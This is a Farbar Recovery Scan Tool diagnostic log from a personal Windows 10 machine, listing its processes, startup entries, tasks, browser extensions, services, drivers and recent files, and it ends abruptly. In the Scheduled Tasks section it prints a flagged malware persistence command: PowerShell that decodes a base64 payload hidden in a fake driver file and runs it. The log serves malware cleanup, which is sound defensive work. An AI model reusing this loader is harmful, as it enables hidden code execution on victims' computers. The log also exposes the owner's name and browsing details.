Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14-06-2022 Ran by [removed] (administrator) on THUNDERBIRD-5 (15-06-2022 11:11:57) Running from D:\in [removed] Platform: Microsoft Windows 10 Pro Version 21H2 19044.1706 (X64) Language: Dutch (Netherlands) -> English (United States) Default browser: Vivaldi Boot Mode: Normal ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (C:\AutoHotkey\AutoHotkey.exe ->) () [File not signed] C:\cat4\cat.exe (C:\AutoHotkey\AutoHotkey.exe ->) (Mathias Svensson) [File not signed] C:\Mc\MultiCommander.exe (C:\AutoHotkey\AutoHotkey.exe ->) (Vivaldi Technologies AS -> Vivaldi Technologies AS) C:\Users\J. Cremers\AppData\Local\Vivaldi\Application\vivaldi.exe <36> (C:\cat4\cat.exe ->) (WACUP (WinAmp Community Update Project)) [File not signed] C:\WACUP\wacup.exe (C:\Girls\Girls.exe ->) (Microsoft Corporation) [File not signed] [File is in use] C:\Program Files\Windows Sidebar\sidebar.exe (C:\Medusa\Installer\nssm.exe ->) (Python Software Foundation -> Python Software Foundation) C:\Medusa\Python\python.exe (C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MsMpEng.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCopyAccelerator.exe (C:\thunderbird\thunderbird.exe ->) () [File not signed] C:\Program Files\SysTray-X\SysTray-X.exe (explorer.exe ->) () [File not signed] C:\AutoHotkey\AutoHotkey.exe (explorer.exe ->) () [File not signed] C:\Girls\Girls.exe (explorer.exe ->) () [File not signed] C:\Pd\AstroClock.exe (explorer.exe ->) () [File not signed] C:\Tools\lexeyes\lexeyes.exe (explorer.exe ->) (Hoo Technologies) [File not signed] C:\Tools\HooNetMeter.exe (explorer.exe ->) (Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Windows Firewall Control\wfc.exe (explorer.exe ->) (Mozilla Corporation -> Mozilla Corporation) C:\thunderbird\thunderbird.exe <4> (explorer.exe ->) (Open-Shell) [File not signed] C:\Program Files\Open-Shell\StartMenu.exe (explorer.exe ->) (SignPath Foundation -> The flameshot Org.) C:\Tools\Flameshot\flameshot.exe (explorer.exe ->) (Support.com Inc -> SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE (explorer.exe ->) (White-Tiger -> -) [File not signed] C:\TClock\Clock64.exe (services.exe ->) () [File not signed] C:\Medusa\Installer\nssm.exe (services.exe ->) () [File not signed] C:\Program Files (x86)\NetTime\NetTimeService.exe (services.exe ->) () [File not signed] C:\Tools\NZBGet\nzbget.exe (services.exe ->) (Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Windows Firewall Control\wfcs.exe (services.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Program Files\Microsoft Update Health Tools\uhssvc.exe (services.exe ->) (Microsoft Windows Hardware Compatibility Publisher -> Thrustmaster®) C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MsMpEng.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\NisSrv.exe (services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_d5d5b9f929f4cb65\Display.NvContainer\NVDisplay.Container.exe <2> (services.exe ->) (voidtools -> voidtools) C:\Tools\Everything\Everything.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1704_none_7de951067ca990f6\TiWorker.exe ==================== Registry (Whitelisted) =================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [Open-Shell Start Menu] => C:\Program Files\Open-Shell\StartMenu.exe [224768 2019-10-26] (Open-Shell) [File not signed] HKLM\...\Run: [Malwarebytes Windows Firewall Control] => C:\Program Files\Malwarebytes\Windows Firewall Control\wfc.exe [644272 2020-08-07] (Malwarebytes Inc -> Malwarebytes) HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION HKU\S-1-5-21-2368218643-1526046976-4280303104-1001\...\Run: [Astroclock] => C:\Pd\AstroClock.exe [1519104 2022-01-23] () [File not signed] HKU\S-1-5-21-2368218643-1526046976-4280303104-1001\...\Run: [Flameshot] => C:\Tools\Flameshot\flameshot.exe [1220928 2022-04-18] (SignPath Foundation -> The flameshot Org.) HKU\S-1-5-21-2368218643-1526046976-4280303104-1001\...\Policies\system: [DisableLockWorkstation] 1 HKU\S-1-5-21-2368218643-1526046976-4280303104-1001\...\Policies\Explorer: [HideSCAMeetNow] 1 HKU\S-1-5-21-2368218643-1526046976-4280303104-1001\...\Policies\Explorer: [NoWinKeys] 1 HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] -> Startup: C:\Users\J. Cremers\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoHotkey.exe - Shortcut.lnk [2019-09-28] ShortcutTarget: AutoHotkey.exe - Shortcut.lnk -> C:\AutoHotkey\AutoHotkey.exe () [File not signed] Startup: C:\Users\J. Cremers\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Girls - Shortcut.lnk [2019-11-24] ShortcutTarget: Girls - Shortcut.lnk -> C:\Girls\Girls.exe () [File not signed] Startup: C:\Users\J. Cremers\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HooNetMeter - Shortcut.lnk [2019-11-24] ShortcutTarget: HooNetMeter - Shortcut.lnk -> C:\Tools\HooNetMeter.exe (Hoo Technologies) [File not signed] Startup: C:\Users\J. Cremers\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lexeyes - Shortcut.lnk [2019-11-24] ShortcutTarget: lexeyes - Shortcut.lnk -> C:\Tools\lexeyes\lexeyes.exe () [File not signed] Startup: C:\Users\J. Cremers\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T-Clock Redux x64.lnk [2019-09-30] ShortcutTarget: T-Clock Redux x64.lnk -> C:\TClock\Clock64.exe (White-Tiger -> -) [File not signed] Startup: C:\Users\J. Cremers\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\thunderbird.exe - Shortcut.lnk [2020-08-07] ShortcutTarget: thunderbird.exe - Shortcut.lnk -> C:\thunderbird\thunderbird.exe (Mozilla Corporation -> Mozilla Corporation) GroupPolicy: Restriction ? <==== ATTENTION GroupPolicy\User: Restriction ? <==== ATTENTION Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION ==================== Scheduled Tasks (Whitelisted) ============ (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {099D8FA1-1639-4322-9D91-A148A1539325} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-09] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {1A6715F6-3BF4-4F16-8ED1-2BC1A159A29C} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-09] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {1D30213D-6513-42DC-8C0A-D2132084E22A} - System32\Tasks\Microsoft\Windows\Management\Provisioning\Sjq0D9Xm0Q\29ADBB73-E8C2-45C1-8EC0-B114F7BC227B => C:\Windows\System32\SyncAppvPublishingServer.vbs [1720 2019-12-07] (Microsoft Windows -> ) -> n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\SkVSjq0D9\DA4A1F43-F9E8-4A62-988D-3DDAC0ECE249.sys'), 1560279, 410); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3)) <==== ATTENTION Task: {358F8D46-B6CD-4286-9F9E-35BE036C9E4B} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\Windows\explorer.exe /NOUACCHECK Task: {6E2F8E29-3C53-461E-8133-1EE4E32E8987} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-09] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {AC1D1B66-6939-4BEE-9090-CFC8398C7A49} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-09] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {EE9A6A09-4DE0-479A-B5CE-C5464D00A185} - System32\Tasks\UninstallTool_SkipUAC_J. Cremers => C:\Tools\geek\geek.exe [1795656 2020-09-02] (CrystalIDEA Software) [File not signed] (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt Tcpip\..\Interfaces\{136ce833-ff3b-4f5a-9478-a8fd9329597e}: [NameServer] 8.8.8.8,8.8.4.4 Edge: ======= DownloadDir: D:\in Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => path not found Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => path not found Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => path not found Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => path not found Edge Profile: C:\Users\J. Cremers\AppData\Local\Microsoft\Edge\User Data\Default [2022-05-11] Edge Extension: (Outlook) - C:\Users\J. Cremers\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bjhmmnoficofgoiacjaajpkfndojknpb [2021-03-20] Edge Extension: (Word) - C:\Users\J. Cremers\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hikhggiobiflkdfdgdajcfklmcibbopi [2021-03-20] Edge Extension: (Excel) - C:\Users\J. Cremers\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\leffmjdabcgaflkikcefahmlgpodjkdm [2021-03-20] Edge Extension: (PowerPoint) - C:\Users\J. Cremers\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\opfacbhaojodjaojgocnibmklknchehf [2021-03-20] FireFox: ======== FF DefaultProfile: jizanq5o.default FF ProfilePath: C:\Users\J. Cremers\AppData\Roaming\Mozilla\Firefox\Profiles\jizanq5o.default [2022-05-09] FF Plugin: @java.com/DTPlugin,version=11.60.2 -> C:\Program Files\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll [2020-01-15] (Oracle America, Inc. -> Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=11.60.2 -> C:\Program Files\Java\jre1.8.0_60\bin\plugin2\npjp2.dll [2020-01-15] (Oracle America, Inc. -> Oracle Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.35.302\npGoogleUpdate3.dll [2019-10-16] (Google Inc -> Google LLC) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.35.302\npGoogleUpdate3.dll [2019-10-16] (Google Inc -> Google LLC) FF Plugin-x32: @videolan.org/vlc,version=3.0.11 -> C:\tools\Vlc\npvlc.dll [2022-03-24] (VideoLAN -> VideoLAN) Chrome: ======= CHR Profile: C:\Users\J. Cremers\AppData\Local\Google\Chrome\User Data\Default [2022-05-31] CHR DownloadDir: D:\in CHR Notifications: Default -> hxxps://www.nu.nl CHR Session Restore: Default -> is enabled. CHR Extension: (Slides) - C:\Users\J. Cremers\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-10-16] CHR Extension: (Docs) - C:\Users\J. Cremers\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-10-16] CHR Extension: (Google Drive) - C:\Users\J. Cremers\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-10-24] CHR Extension: (YouTube) - C:\Users\J. Cremers\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-10-16] CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\J. Cremers\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2022-05-31] CHR Extension: (Closed tabs) - C:\Users\J. Cremers\AppData\Local\Google\Chrome\User Data\Default\Extensions\eonffnnfmbfnmjpaiigdclmfelolemah [2022-01-31] CHR Extension: (Sheets) - C:\Users\J. Cremers\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-10-16] CHR Extension: (Google Docs Offline) - C:\Users\J. Cremers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-04-21] CHR Extension: (Social Fixer for Facebook) - C:\Users\J. Cremers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ifmhoabcaeehkljcfclfiieohkohdgbb [2022-01-31] CHR Extension: (Ghostery – Privacy Ad Blocker) - C:\Users\J. Cremers\AppData\Local\Google\Chrome\User Data\Default\Extensions\mlomiejdfkolichcflejclcbmpeaniij [2022-05-11] CHR Extension: (Chrome Web Store Payments) - C:\Users\J. Cremers\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-30] CHR Extension: (Virtual Tour for Google Street View™) - C:\Users\J. Cremers\AppData\Local\Google\Chrome\User Data\Default\Extensions\okgfglgogpkomipfflpajohdkaflndoh [2021-04-10] CHR Extension: (Gmail) - C:\Users\J. Cremers\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-24] CHR Extension: (Chrome Media Router) - C:\Users\J. Cremers\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2021-04-29] Vivaldi: ======= VIV Profile: C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default [2022-06-15] VIV DownloadDir: D:\in VIV Notifications: Default -> hxxps://am1.badoo.com VIV HomePage: Default -> hxxps://google.com/ VIV Extension: (Tiny Suspender) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\bbomjaikkcabgmfaomdichgcodnaeecf [2022-04-02] VIV Extension: (Disable HTML5 Autoplay (Reloaded)) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\cafckninonjkogajnihihlnnimmkndgf [2022-05-13] VIV Extension: (uBlock Origin) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2022-04-08] VIV Extension: (Search by Image) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\cnojnbdhbhnkbcieeekonklommdnndci [2022-05-23] VIV Extension: (Tidy Bookmarks Lite) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\daojfgjlldndcjaidckepeokebmioobl [2022-04-02] VIV Extension: (S3.Translator) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\debnnjfbneojbmioajinefnflopdohjk [2022-04-02] VIV Extension: (Recent History) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\fbmkfdfomhhlonpbnpiibloacemdhjjm [2022-04-02] VIV Extension: (I don't care about cookies) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\fihnjjcciajhdojfnbdddfaoknhalnja [2022-05-15] VIV Extension: (Site root) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\heljngnjdbpcejgbeigbjmdpdafalgkh [2022-04-02] VIV Extension: (Social Fixer for Facebook) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\ifmhoabcaeehkljcfclfiieohkohdgbb [2022-04-02] VIV Extension: (Reopen closed tab Button™) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\jjchodckpgecejjbbdedboikbidieebe [2022-04-02] VIV Extension: (Bypass Paywall) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\kkofljmpfaanangehehmbkkmbgjjlgja [2022-04-10] VIV Extension: (Make America Kittens Again) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\klchnmggepghlcolikgaekpibclpmgcm [2022-04-02] VIV Extension: (Marktplaats zonder spam) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\lekhkeegnegccgaoakphligfonjmaodh [2022-04-02] VIV Extension: (Downloads Pro) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\lhhocifdmhogpekeppdjamkelohahbop [2022-04-02] VIV Extension: (Ghostery – Privacy Ad Blocker) - C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\Default\Extensions\mlomiejdfkolichcflejclcbmpeaniij [2022-06-10] VIV Profile: C:\Users\J. Cremers\AppData\Local\Vivaldi\User Data\System Profile [2022-05-11] ==================== Services (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S3 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [173472 2017-01-31] (SUPERAntiSpyware.com -> SUPERAntiSpyware.com) S3 CdRomArbiterService; C:\Program Files\Common Files\cdarbsvc\cdarbsvc_v1.0.0_x64.exe [8704 2020-11-08] (GuinpinSoft inc) [File not signed] R2 Everything; C:\Tools\Everything\Everything.exe [2261600 2021-05-12] (voidtools -> voidtools) S3 LxssManagerUser; C:\WINDOWS\system32\lxss\wslclient.dll [301056 2022-05-09] (Microsoft Windows -> Microsoft Corporation) S3 MacriumService; C:\Program Files\Macrium\Common\MacriumService.exe [6435880 2019-11-18] (Paramount Software UK Ltd -> Paramount Software UK Ltd) R2 Medusa; C:\Medusa\Installer\nssm.exe [331264 2019-06-26] () [File not signed] R2 NetTimeSvc; C:\Program Files (x86)\NetTime\NetTimeService.exe [473088 2012-05-12] () [File not signed] R2 NZBGet; C:\Tools\NZBGet\nzbget.exe [4002816 2021-06-03] () [File not signed] S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6254856 2022-05-28] (Microsoft Windows Publisher -> Microsoft Corporation) S3 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [12986664 2021-12-15] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) R2 tmInstall; C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.EXE [140816 2021-08-27] (Microsoft Windows Hardware Compatibility Publisher -> Thrustmaster®) S3 VBoxSDS; C:\VirtualBox\VBoxSDS.exe [694016 2019-09-03] (Oracle Corporation -> Oracle Corporation) R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\NisSrv.exe [3116848 2022-04-09] (Microsoft Windows Publisher -> Microsoft Corporation) R2 wfcs; C:\Program Files\Malwarebytes\Windows Firewall Control\wfcs.exe [125104 2020-08-07] (Malwarebytes Inc -> Malwarebytes) R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MsMpEng.exe [133544 2022-04-09] (Microsoft Windows Publisher -> Microsoft Corporation) R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_d5d5b9f929f4cb65\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_d5d5b9f929f4cb65\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem ===================== Drivers (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S3 AsrDrv102; C:\Windows\SysWOW64\Drivers\AsrDrv102.sys [22248 2020-01-27] (ASROCK Incorporation -> ASRock Incorporation) [File not signed] S3 AsrDrv103; C:\Windows\SysWOW64\Drivers\AsrDrv103.sys [34568 2020-01-29] (ASROCK Incorporation -> ASRock Incorporation) [File not signed] S3 CisUtMonitor; C:\WINDOWS\System32\DRIVERS\CisUtMonitor.sys [54800 2018-11-24] (Software Security Systems ChTUP -> CrystalIdea Software) S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [103064 2013-05-02] (Samsung Electronics CO., LTD. -> DEVGURU Co., LTD.(www.devguru.co.kr)) S3 DroidCam; C:\WINDOWS\System32\drivers\droidcam.sys [33592 2020-03-17] (DEV47 APPS -> Dev47Apps) S3 DroidCamVideo; C:\WINDOWS\System32\drivers\droidcamvideo.sys [229432 2020-03-17] (DEV47 APPS -> Dev47Apps) S3 epmntdrv; C:\WINDOWS\system32\epmntdrv.sys [34744 2019-02-18] (CHENGDU YIWO Tech Development Co., Ltd. -> ) R0 EPMVolFl; C:\WINDOWS\System32\drivers\EPMVolFl.sys [30136 2019-04-12] (CHENGDU YIWO Tech Development Co., Ltd. -> Windows (R) Codename Longhorn DDK provider) R1 gvm; C:\WINDOWS\system32\DRIVERS\gvm.sys [399648 2020-01-27] (Google LLC -> Google LLC) R1 ISODrive; C:\UltraISO\drivers\ISODrv64.sys [115600 2010-01-29] (SHENZHEN YIBO DIGITAL SYSTEMS DEVELOPMENT CO. LTD. -> EZB Systems, Inc.) S3 PSMounterEx; C:\Windows\System32\Drivers\PSMounterEx.sys [179416 2019-02-15] (Paramount Software UK Ltd -> Windows (R) Win 7 DDK provider) R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (Support.com, Inc. -> SUPERAdBlocker.com and SUPERAntiSpyware.com) R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (Support.com, Inc. -> SUPERAdBlocker.com and SUPERAntiSpyware.com) S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [203672 2013-05-02] (Samsung Electronics CO., LTD. -> DEVGURU Co., LTD.(www.devguru.co.kr)) S3 tmhidusb; C:\WINDOWS\system32\DRIVERS\tmhidusb.sys [424464 2021-08-27] (Microsoft Windows Hardware Compatibility Publisher -> Thrustmaster) S3 VBAudioVMVAIOMME; C:\WINDOWS\System32\drivers\vbaudio_vmvaio64_win10.sys [71712 2019-10-18] (Vincent Burel -> Windows (R) Win 7 DDK provider) R3 VBoxNetAdp; C:\WINDOWS\system32\DRIVERS\VBoxNetAdp6.sys [237376 2019-09-03] (Oracle Corporation -> Oracle Corporation) R1 VBoxNetLwf; C:\WINDOWS\system32\DRIVERS\VBoxNetLwf.sys [248464 2019-09-03] (Oracle Corporation -> Oracle Corporation) S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [49600 2022-04-09] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [443664 2022-04-09] (Microsoft Windows -> Microsoft Corporation) R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [90384 2022-04-09] (Microsoft Windows -> Microsoft Corporation) R3 ysusb_w10_64; C:\WINDOWS\system32\drivers\ysusb_w10_64.sys [180024 2020-01-19] (Yamaha Corporation -> Yamaha Corporation) ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One month (created) (Whitelisted) ========= (If an entry is included in the fixlist, the file/folder will be moved.) 2022-06-15 11:11 - 2022-06-15 11:12 - 000000000 ____D C:\FRST 2022-06-14 21:30 - 2022-05-05 20:50 - 001905920 _____ C:\WINDOWS\system32\vulkaninfo-1-999-0-0-0.exe 2022-06-14 21:30 - 2022-05-05 20:50 - 001905920 _____ C:\WINDOWS\system32\vulkaninfo.exe 2022-06-14 21:30 - 2022-05-05 20:50 - 001478408 _____ C:\WINDOWS\SysWOW64\vulkaninfo-1-999-0-0-0.exe 2022-06-14 21:30 - 2022-05-05 20:50 - 001478408 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe 2022-06-14 21:30 - 2022-05-05 20:50 - 001467976 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll 2022-06-14 21:30 - 2022-05-05 20:50 - 001432320 _____ C:\WINDOWS\system32\vulkan-1-999-0-0-0.dll 2022-06-14 21:30 - 2022-05-05 20:50 - 001432320 _____ C:\WINDOWS\system32\vulkan-1.dll 2022-06-14 21:30 - 2022-05-05 20:50 - 001209416 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll 2022-06-14 21:30 - 2022-05-05 20:50 - 001145600 _____ C:\WINDOWS\SysWOW64\vulkan-1-999-0-0-0.dll 2022-06-14 21:30 - 2022-05-05 20:50 - 001145600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll 2022-06-14 21:30 - 2022-05-05 20:47 - 000724688 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvml.dll 2022-06-14 21:30 - 2022-05-05 20:44 - 005729848 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll 2022-06-14 21:29 - 2022-05-05 20:47 - 000586440 _____ C:\WINDOWS\system32\nvofapi64.dll 2022-06-14 21:29 - 2022-05-05 20:47 - 000461392 _____ C:\WINDOWS\SysWOW64\nvofapi.dll 2022-06-14 21:29 - 2022-05-05 20:46 - 002120912 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll 2022-06-14 21:29 - 2022-05-05 20:46 - 001602256 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll 2022-06-14 21:29 - 2022-05-05 20:46 - 001529552 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll 2022-06-14 21:29 - 2022-05-05 20:46 - 001178184 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll 2022-06-14 21:29 - 2022-05-05 20:46 - 000713280 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvidia-smi.exe 2022-06-14 21:29 - 2022-05-05 20:45 - 006963928 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll 2022-06-14 21:29 - 2022-05-05 20:45 - 006226624 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll 2022-06-14 21:29 - 2022-05-05 20:45 - 005100744 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll 2022-06-14 21:29 - 2022-05-05 20:45 - 002932928 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll 2022-06-14 21:29 - 2022-05-05 20:45 - 000731208 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll 2022-06-14 21:29 - 2022-05-05 20:45 - 000581840 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll 2022-06-14 21:29 - 2022-05-05 20:45 - 000458816 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdebugdump.exe 2022-06-14 21:29 - 2022-05-05 20:43 - 000851152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\MCU.exe 2022-06-14 21:29 - 2022-05-05 20:42 - 006465208 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll 2022-06-14 21:29 - 2022-05-05 03:00 - 000089337 _____ C:\WINDOWS\system32\nvinfo.pb 2022-06-14 13:12 - 2022-06-14 13:12 - 000000000 ____D C:\WINDOWS\LastGood.Tmp 2022-06-13 12:33 - 2022-06-15 10:56 - 000000000 ____D C:\thunderbird 2022-06-09 23:11 - 2022-06-09 23:11 - 000000000 ____D C:\Users\J. Cremers\Documents\sonible 2022-06-09 23:11 - 2022-06-09 23:11 - 000000000 ____D C:\Users\J. Cremers\AppData\Roaming\com.sonible.smartEQ2 2022-06-09 22:47 - 2022-06-09 23:11 - 000000000 ____D C:\Program Files\smartEQ2 2022-06-09 21:02 - 2022-06-09 21:02 - 000000000 ____D C:\Users\J. Cremers\AppData\Roaming\Klanghelm 2022-06-09 19:04 - 2022-06-09 19:04 - 000000000 ____D C:\Users\J. Cremers\Documents\Crave DSP 2022-06-09 19:04 - 2022-06-09 19:04 - 000000000 ____D C:\Users\J. Cremers\AppData\Local\Crave DSP 2022-06-07 11:48 - 2022-06-07 11:50 - 000000000 ____D C:\Program Files (x86)\FabFilter 2022-06-07 10:44 - 2022-06-07 10:50 - 000000000 ____D C:\Users\J. Cremers\AppData\Roaming\FabFilter 2022-06-07 10:44 - 2022-06-07 10:44 - 000000000 ____D C:\Users\J. Cremers\Documents\FabFilter 2022-06-06 